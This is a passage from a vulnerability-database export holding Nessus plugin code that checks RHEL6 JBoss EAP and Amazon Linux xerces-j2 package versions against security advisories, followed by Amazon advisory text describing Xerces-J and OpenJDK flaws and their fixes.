value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-welcome-content-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:netty\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-bindings\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:weld-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wss4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xjc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-security\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1818\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! 
(rpm_exists(release:\"RHEL6\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL6\", reference:\"apache-cxf-2.7.12-1.SP1_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"apache-cxf-xjc-utils-2.6.2-3.redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"cxf-xjc-boolean-2.6.2-3.redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"cxf-xjc-dv-2.6.2-3.redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"cxf-xjc-ts-2.6.2-3.redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-core-eap6-4.2.14-9.SP4_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-eap6-4.2.14-9.SP4_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-entitymanager-eap6-4.2.14-9.SP4_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-envers-eap6-4.2.14-9.SP4_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-infinispan-eap6-4.2.14-9.SP4_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-common-api-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-common-impl-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-common-spi-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-core-api-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-core-impl-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-deployers-common-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", 
reference:\"ironjacamar-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-jdbc-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-spec-api-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-validator-eap6-1.0.28-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"javassist-eap6-3.18.1-5.GA_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-appclient-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-cli-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-client-all-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-clustering-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-cmp-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-configadmin-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-connector-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-console-2.2.11-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-controller-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-controller-client-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-core-security-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-deployment-repository-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-deployment-scanner-7.4.2-3.Final_redhat_2.1.ep6.el6\")) 
flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-domain-http-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-domain-management-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-ee-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-ee-deployment-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-ejb3-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-embedded-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-host-controller-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jacorb-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jaxr-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jaxrs-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jdr-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jmx-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jpa-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jsf-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jsr77-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-logging-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-mail-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-management-client-content-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if 
(rpm_check(release:\"RHEL6\", reference:\"jboss-as-messaging-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-modcluster-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-naming-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-network-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-osgi-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-osgi-configadmin-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-osgi-service-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-picketlink-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-platform-mbean-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-pojo-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-process-controller-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-protocol-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-remoting-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-sar-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-security-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-server-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-system-jmx-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-threads-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if 
(rpm_check(release:\"RHEL6\", reference:\"jboss-as-transactions-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-version-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-web-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-webservices-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-weld-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-xts-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-hal-2.2.11-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-logmanager-1.5.2-2.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-metadata-7.1.2-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-metadata-appclient-7.1.2-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-metadata-common-7.1.2-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-metadata-ear-7.1.2-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-metadata-ejb-7.1.2-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-metadata-web-7.1.2-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-remoting3-jmx-1.1.3-1.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-xnio-base-3.0.11-1.GA_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-appclient-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-bundles-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if 
(rpm_check(release:\"RHEL6\", reference:\"jbossas-core-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-domain-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-javadocs-7.4.2-2.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-modules-eap-7.4.2-2.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-product-eap-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-standalone-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-welcome-content-eap-7.4.2-3.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossws-common-2.3.1-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossws-cxf-4.3.1-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"netty-3.6.10-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"picketlink-bindings-2.5.3-11.SP12_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"picketlink-federation-2.5.3-12.SP12_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"resteasy-2.3.8-10.SP3_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"weld-core-1.1.25-1.Final_redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"wss4j-1.6.16-1.redhat_2.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xerces-j2-eap6-2.9.1-17.redhat_6.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xjc-utils-2.6.2-3.redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xml-security-1.5.7-2.redhat_1.1.ep6.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : 
rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-cxf / apache-cxf-xjc-utils / cxf-xjc-boolean / cxf-xjc-dv / etc\");\n }\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T06:39:00", "bulletinFamily": "scanner", "description": "A resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU.", "modified": "2019-12-02T00:00:00", "id": "ALA_ALAS-2014-436.NASL", "href": "https://www.tenable.com/plugins/nessus/78779", "published": "2014-11-03T00:00:00", "title": "Amazon Linux AMI : xerces-j2 (ALAS-2014-436)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-436.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78779);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2013-4002\");\n script_xref(name:\"ALAS\", value:\"2014-436\");\n script_xref(name:\"RHSA\", value:\"2014:1319\");\n\n script_name(english:\"Amazon Linux AMI : xerces-j2 (ALAS-2014-436)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. 
A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-436.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update xerces-j2' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xerces-j2-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xerces-j2-javadoc-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xerces-j2-javadoc-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xerces-j2-javadoc-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xerces-j2-javadoc-xni\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xerces-j2-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"xerces-j2-2.7.1-12.7.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xerces-j2-demo-2.7.1-12.7.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xerces-j2-javadoc-apis-2.7.1-12.7.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xerces-j2-javadoc-impl-2.7.1-12.7.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xerces-j2-javadoc-other-2.7.1-12.7.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xerces-j2-javadoc-xni-2.7.1-12.7.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xerces-j2-scripts-2.7.1-12.7.19.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xerces-j2 / xerces-j2-demo / xerces-j2-javadoc-apis / etc\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "amazon": [{"lastseen": "2019-05-29T17:22:34", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA resource consumption issue was found in the way Xerces-J handled XML declarations. 
A remote attacker could use an XML document with a specially crafted declaration using a long pseudo-attribute name that, when parsed by an application using Xerces-J, would cause that application to use an excessive amount of CPU.\n\n \n**Affected Packages:** \n\n\nxerces-j2\n\n \n**Issue Correction:** \nRun _yum update xerces-j2_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n noarch: \n xerces-j2-javadoc-apis-2.7.1-12.7.19.amzn1.noarch \n xerces-j2-javadoc-xni-2.7.1-12.7.19.amzn1.noarch \n xerces-j2-javadoc-other-2.7.1-12.7.19.amzn1.noarch \n xerces-j2-demo-2.7.1-12.7.19.amzn1.noarch \n xerces-j2-2.7.1-12.7.19.amzn1.noarch \n xerces-j2-scripts-2.7.1-12.7.19.amzn1.noarch \n xerces-j2-javadoc-impl-2.7.1-12.7.19.amzn1.noarch \n \n src: \n xerces-j2-2.7.1-12.7.19.amzn1.src \n \n \n", "modified": "2014-11-01T14:05:00", "published": "2014-11-01T14:05:00", "id": "ALAS-2014-436", "href": "https://alas.aws.amazon.com/ALAS-2014-436.html", "title": "Medium: xerces-j2", "type": "amazon", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T17:22:35", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nMultiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine. ([CVE-2013-5782 __](<https://access.redhat.com/security/cve/CVE-2013-5782>))\n\nThe class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. ([CVE-2013-5830 __](<https://access.redhat.com/security/cve/CVE-2013-5830>))\n\nMultiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. 
An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. ([CVE-2013-5829 __](<https://access.redhat.com/security/cve/CVE-2013-5829>), [CVE-2013-5814 __](<https://access.redhat.com/security/cve/CVE-2013-5814>), [CVE-2013-5817 __](<https://access.redhat.com/security/cve/CVE-2013-5817>), [CVE-2013-5842 __](<https://access.redhat.com/security/cve/CVE-2013-5842>), [CVE-2013-5850 __](<https://access.redhat.com/security/cve/CVE-2013-5850>))\n\nMultiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions. ([CVE-2013-5809 __](<https://access.redhat.com/security/cve/CVE-2013-5809>))\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions. ([CVE-2013-5802 __](<https://access.redhat.com/security/cve/CVE-2013-5802>))\n\nMultiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed. ([CVE-2013-5825 __](<https://access.redhat.com/security/cve/CVE-2013-5825>), [CVE-2013-4002 __](<https://access.redhat.com/security/cve/CVE-2013-4002>), [CVE-2013-5823 __](<https://access.redhat.com/security/cve/CVE-2013-5823>))\n\nMultiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. 
([CVE-2013-3829 __](<https://access.redhat.com/security/cve/CVE-2013-3829>), [CVE-2013-5840 __](<https://access.redhat.com/security/cve/CVE-2013-5840>), [CVE-2013-5774 __](<https://access.redhat.com/security/cve/CVE-2013-5774>), [CVE-2013-5783 __](<https://access.redhat.com/security/cve/CVE-2013-5783>), [CVE-2013-5820 __](<https://access.redhat.com/security/cve/CVE-2013-5820>), [CVE-2013-5849 __](<https://access.redhat.com/security/cve/CVE-2013-5849>), [CVE-2013-5790 __](<https://access.redhat.com/security/cve/CVE-2013-5790>), [CVE-2013-5784 __](<https://access.redhat.com/security/cve/CVE-2013-5784>))\n\nIt was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory. ([CVE-2013-5778 __](<https://access.redhat.com/security/cve/CVE-2013-5778>))\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks. ([CVE-2013-5804 __](<https://access.redhat.com/security/cve/CVE-2013-5804>), [CVE-2013-5797 __](<https://access.redhat.com/security/cve/CVE-2013-5797>))\n\nVarious OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data. ([CVE-2013-5780 __](<https://access.redhat.com/security/cve/CVE-2013-5780>))\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks. 
